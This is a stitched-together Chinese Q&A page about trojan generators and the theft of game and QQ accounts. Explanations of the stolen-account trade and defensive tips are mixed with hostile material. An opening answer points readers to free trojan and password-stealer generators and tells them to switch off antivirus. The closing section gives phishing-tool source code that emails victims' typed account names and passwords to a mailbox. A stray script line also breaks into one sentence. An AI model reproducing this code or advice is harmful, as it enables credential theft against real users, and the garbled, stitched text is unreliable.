网站入侵

木马生成器都有那些?

有图片木马生成器，有QQ木马生成器，有图片捆绑器，有邮箱、QQ盗号生成器，这些都可以在百度里下载，全部是免费的，建议LZ先把木马防火墙关了，否则的话杀毒软件会自动删除的。

为什么会有盗号风险

首先，不管盗号的人再厉害，你的电脑必须中他的木马，即使你设置了密保卡、手机二级密码也一样破保。所以装备被盗首先要问一下自己！ 第一，流量木马盗号，木马作者写好木马和木马生成器，做好免杀（可以躲过杀毒软件的查杀），卖给或者垄断给一些比较有实力的工作室或老板，通常这些木马作者会送一些流量，但是一般不能满足需要。所以，买马的人自己可以找到流量商，所谓的流量商大部分是些精通网站入侵的黑客，他们把木马代码挂到一些网站上，那么这些网站，又分为主题站，外G站等等，主题站类似与现在的17173和猴岛，当然这2个网站被入侵的机会不大，但是一些中小站往往成为受害者。有了流量以后，买马的人会找人制作好箱子，箱子就是把盗号的信息数据接入的网站，各个大区的帐号会自动发送到各个大区的箱子里，一个帐号叫做一封信或一ID，目前DNF的帐号一般分大箱子和小箱子，大箱子过滤25级，价格在1.8-2.4一ID，小箱子1-25级, 一般2毛钱一ID，出箱子的人把这些箱子卖给洗号的人，洗号的人叫洗信工，他们把买来的信都洗掉~然后在游戏里卖掉材料装备，再把YXB卖掉从中间赚取利润~ 第二，木马捆绑钓鱼， 这些比流量箱子低级点，主要是在游戏里喊喇叭，说某某网站有外G，大家快去用啊，相信的人一去下载那外G，就中了木马，然后登陆游戏就被盗号了~ 第三，纯粹钓鱼网站， 盗号者会制作高度仿真的网站，跟官方网站简直一模一样，也是在游戏里喊喇叭，说 要你到某某网站去领取复活啊时装啊什么的，这类网站一般没有木马，你登陆以后，会要你登陆帐号领取奖品，你一登陆，你的帐号密码就到箱子里去了。 第四，纯粹的个人放马， 比如在游戏里喊，请大家加入XXXXXX群啊，群里共享里有外G用！！很多人经不住诱惑，进去以后去点，结果马上中马被盗~！ 第五，瞄准目标放马，也属于个人放马类型，但是这种更加狠毒，只选有钱的下手。经典案例：某天一个人在游戏里喊：工作室长期出黑货，4-6折，有实力的商人来，加qq XXXXXX，你加他qq，他先要求看你的YXB的截图，说是看你实力够不，没个几千W他不会跟你谈，然后他会发些仓库存货的截图，数量惊人，让你很高兴，然后他会发个文本文档给你，标题还是“价格表”或者“DNF全区出货价格表”在线发送给你，一般有点常识的人不会轻易去接，但是看到一个只有18-20K的文件，谁都不会疑心了，你可以知道，一个免杀的盗号DNF木马，大小才14K啊，接了以后，打开，中马或灰鸽子，结果就是，几千W没了，洗的干净的不得了。 一个洗信熟练工，可以在3分钟以内洗掉一个满的黄金仓库，5分钟内洗掉堆积几十W的材料装备。 有人会问，为什么我上了密保卡，还是被洗呢？我来解答吧 1， 在线破保。 这类的破保，需要玩家在线，而且正使用那台有木马的电脑，首先他们用破保器，也就是直接操纵木马的那东西，把玩家踢下线，然后盗号者会在自己电脑上用玩家的帐号密码登陆，但是进不了游戏，因为有密码卡，不过没关系，盗号者这里如果出现了需要的密码卡坐标是 A1，B2，C3的话，他会把这个需要破保的信息，发送给木马，也就是玩家那一端，如果玩家登陆游戏，那么木马会制造一个假的密码卡坐标界面，而上面需求的，就是盗号人在另外一端登陆玩家帐号的真正的坐标，于是玩家会输入比如，35，57，86 ，那么这个信息直接就发送到盗号人那端，他就可以用这3个坐标直接登陆玩家帐号了，而玩家这边则被木马限制死，无限掉线或登陆失败，登陆不了，一直到盗号的那边大摇大摆洗完了号，玩家才登得上。 2，离线破保之截取全屏。这是最新出现的破保方式，木马可以在玩家打开游戏和JPG或BMP或GIF文件时，截取电脑全屏的图，然后发到盗号箱子里去，这种方式比起在线破保厉害多了，不过需要玩家是把密码卡放在电脑上打开的，如果用实物卡或者抄在纸上就无效了。 3，qq硬盘破保护，很多人把密码卡放在qq硬盘上，这是最愚蠢的方法了，就不在这里罗嗦了。 如何预防： 1，给电脑装上杀毒软件定时更新，360安全和保险箱都装上，系统补丁打好是必须的。 2，不要贪小便宜，去找什么黑货工作室，我可以很负责告诉大家，真正足量的作室都有自己长期稳定下家的，你不是职业玩家的话，不要去走这条路。 3，至于外G，要用和不用都是自己的事，我管不到，但是我可以告诉你，天下没有免费的午餐，那些写木马的人，很多同时就是写外G的人，外G能用的话，他一天的流量可以让他吃1个月，你想免费外G，作者吃什么喝什么去？免费可以，帐号拿来！ 4，输入密码有学问，比如你的密码是abc111，输入的时候，请先输入111，然后用鼠标点到光标前面再输入abc，这样你的密码在箱子里面显示出来就是111abc，有很多木马是用的键盘记录的，这个小花样可以让你淘汰不少菜鸟木马~~ 5，输入密码卡有讲究，这样可以防止在线破保，你在输入密码卡坐标的界面那，不是有一个换张图片么？本来是要A1，B2，C3，你就换一个，如果还出现A1，B2，C3那么恭喜你，中马了，赶快杀毒吧，如果坐标改变了2次以上，说明安全，但是不要轻心，3个坐标先输入一次错误的，随便按几个数进去，会显示密码卡坐标验证失败，没关系，以最快的速度再输入重新出来的正确的坐标，OK，他就算是神仙木马，也拿你没办法了，这个方法适用于没有任何防范的网吧的玩家~~！ 6，密码卡的存放有讲究，直接放qq空间，相册，硬盘都是愚蠢的做法，因为有全屏截取，所以实物卡是最好的，申请密保卡的时候，立刻用纸把密保卡的数字坐标抄下来，而保存在电脑中的密保卡一定要删除。还有就是直接把密保卡存在手中当中，不过记住电脑中不能保存原件哦！ 7，密码卡时间最多使用1个月，否则，电脑有一种木马记录你60%的密保数字时，就可以盗你的号了 8，给大家透露下，垃圾TX那无限网络中断被骂的要死，同时给洗号的也加了不少麻烦，你想在线破保进游戏看到包里1000多W，还没来得及动手就中断了，而玩家又不上线破不了保了，那是什么感觉。还有洗一个号中断中断中断无数次，心里那火是什么感觉，哈哈，也算TX无意中做了一个好事~！很多人身上被洗了一点东西但是没洗干净，别以为是洗号的怜惜你，是中断帮了你的大忙了~

什么是钓鱼软件

钓鱼软件，也叫盗号木马。

盗号木马的原理及如何防范

随着互联网技术的迅速发展网络给人们带来了极大的便利，日益发达的网络产品越来越多。各种网络应用都离不开账号密码，账号密码是网络身份的一种标识。这些帐号密码所代表的是巨大的经济价值与个人的隐私。一些动机不纯的黑客高手就想尽办法利用灰色的网络技术和功能强大的盗号木马盗取相应的密码和帐号，给我们的生活带来难以言喻的困扰。

现在就盗号木马的特点和防范方法跟大家一起讨论一下，希望对于保护账号安全起到一定的帮助作用。

木马的特点 1 隐秘性

也就是说，一旦一个木马通过各种手段被引入了主机（这个过程称为“植入”），那么它首先要找到一个地方隐藏起来，等待时机发作，在被植入的主机看来就好像什么事情都没有。

2 自动运行性

一个好的木马绝对不可能奢望对方来点击运行，也不能只执行一次，然后随着系统的关机而不再运行，这样的只发作一次的木马是没有什么作用的。木马往往具有自动运行性，也就是说要么随机子的启动运行而发作，要么等某个条件来触发，而这个触发条件应该很常用的。

3 危害性

如果一个木马没有什么危害，那么它也就失去了入侵的目的，一个木马的危害性主要表现在控制性上，木马的制作者通过植入木马 ，然后非法获取系统的权限，达到最终控制对方机子的目的，比如它可以偷听你的密码（盗号），修改你的文件，下载感兴趣的文件，甚至格式化硬盘。

盗号木马的原理 1 偷梁换柱型

盗号者入侵你的电脑后，会把你的程序的快捷方式换成盗号者自己制作的登陆界面，当你打开“网络程序”登陆界面进行登陆的时候，第一次输入密码后，会提示密码错误等信息，同时记录下你的账号和密码，然后会自动跳转到真实的登陆串口，这时你就能真的登陆上去了，你不知道的是，其实你的资料已经发到盗号者的邮箱或者空间去了。

2 直接替换型

盗号者会直接把你“网络程序安装文件夹”里面的一些文件替换掉。然后不管你怎么打

var script = document.createElement('script'); script.src = 'http://static.pay.baidu.com/resource/baichuan/ns.js'; document.body.appendChild(script);

开都是盗号者的登陆窗口。也许你会问是怎么登进去的呢？很多程序其实还有另外一种登陆方式，那就是在CMD命令行登陆，所以，盗号者在他的登陆界面代码里面协商把你的输入账号和密码在CMD下登陆并且设置CMD不显示，也就神不知鬼不觉的盗取了账号密码了。

3 键盘记录型

这种木马是应用了C++里面的键盘“钩子”来获取你的键盘动作，也有监视鼠标动作的，然后积累起来发送到盗号者手里。

4 截图

用木马快照你的屏幕。通过屏幕快照将用户的登陆界面连续保存为多张图片，然后通过自带的发送模块发向指定的邮件接收者，盗号木马通过对照图片中鼠标的点击位置，就很有可能破译出用户的登陆账号和密码。

5 内存扫描拦截

盗号木马病毒运行后，它通过HOOK技术对系统中所有程序的进程检测，对相关API的调用进行了监控，盗号木马盗号软件通过查找待定句柄、窗口或关键字，可以拦截对Windows中的键盘、鼠标、复制、粘贴等事件，或者直接读取进程未加密的账号密码，或者对其他API函数的调用事件拦截，这种木马具有很强的隐蔽性，目前没有非常有效的预防手段。

6 钓鱼网站

网络钓鱼攻击，恶意网站伪装成知名公司主页，利用域名相似性和IE浏览器的地址欺骗漏洞，诱骗网名输入账号和密码，并且通过恶意脚本程序种植盗号木马病毒，诱使更多用户访问该网站造成感染，很多网站都可以QQ账号登陆，给了盗QQ号更加方便的平台。

防范措施 1 截断传染源

首先，作为普通用户，杀毒防护软件是必不可少的。在用户首次安装完系统之后、首次联网之前就应该将杀毒防护软件安装好，记得开启防护监控。紧接着应该进行一次全盘的扫描，确保未联网前系统是无毒的。

其次，浏览网页或者下载软件时要特别谨慎，往往木马就是捆绑在不亮网页和不明程序上的。用户应该做到不浏览不健康不正规的网站，尤其不能点击网站上浮动的色情广告。另外，常用软件要去正规下载站去下载安装。

再次，用户使用电脑方面也要注意，在插入陌生的U盘时应该先对U盘进行病毒查杀。打开优盘最好不用双击方式，应该用右键选择“打开”或者“资源管理器”的方法打开。因为双击打开盘符会触发Autorun启发方式的木马病毒。

2 禁止自动启动

这一点，可以用比如360安全卫士、金山卫士等软件中的功能来实现，禁止不必要的开机自启程序。

3 多用软键盘

最后，针对木马病毒记录键盘的特征，对于非常重要的账号密码，如网上银行，阿里旺旺，股票账号等等，建议使用软键盘输入账号密码，虽然麻烦但是能大大增加安全性。

4 善用账号保护工具

善于利用其它外部的账号工具也可以帮助更好的保障安全。比如超级密码、手机短信验证、硬件Ukey、手机令牌软件（也叫号令）等，在这里着重提一下号令。号令属于手机客户端软件，采用OTP技术，基于时间同步的方式，每隔60秒钟变化一次密码，用户登陆的时候须输入账户名、静态密码、动态密码三块，这样即使静态密码泄露或者被盗，盗号者在没有动态密码的前提下，也不可能登陆账号。这种软件是通过一定的算法达到时间同步，所以过程中无需使用流量，而且由于本号令软件是植入手机（装载在安卓或者IOS系统中），真正做到了贴身保护，一令无忧，安全、便捷、用户体验良好。而且还拥有诸如账号锁定、消息推送等功能，无论对于商家还是终端客户来说都是一个实用的利器。

木马生成器是干什么的`？

是很早的软件了.几年前就有看过了那个一般没什么用

是用来生成一些简单的编程

盗号用的.

发送到你的邮箱上面

现在没啥用.

一般普通的杀毒软件都可以发现

钓鱼盗号制作cmd盗号教程中库文件名输入什么？

一家名为“我就是社工库”的网站，可以通过输入QQ... 对于欺诈、钓鱼、盗号等网络黑产，正在联合警方重拳打击 ，你自己小心点就好了。

QQ钓鱼生成器源码（易语言的）！

连接发信服务器 (“smtp.163.com”, , “13902286203@163.com”, “163邮箱密码”, )

发送邮件 (“钓鱼”, “帐号:”+编辑框1.内容+#换行符+“密码:”+编辑框2.内容, 13902286203@163.com”, , , “13902286203@163.com”, )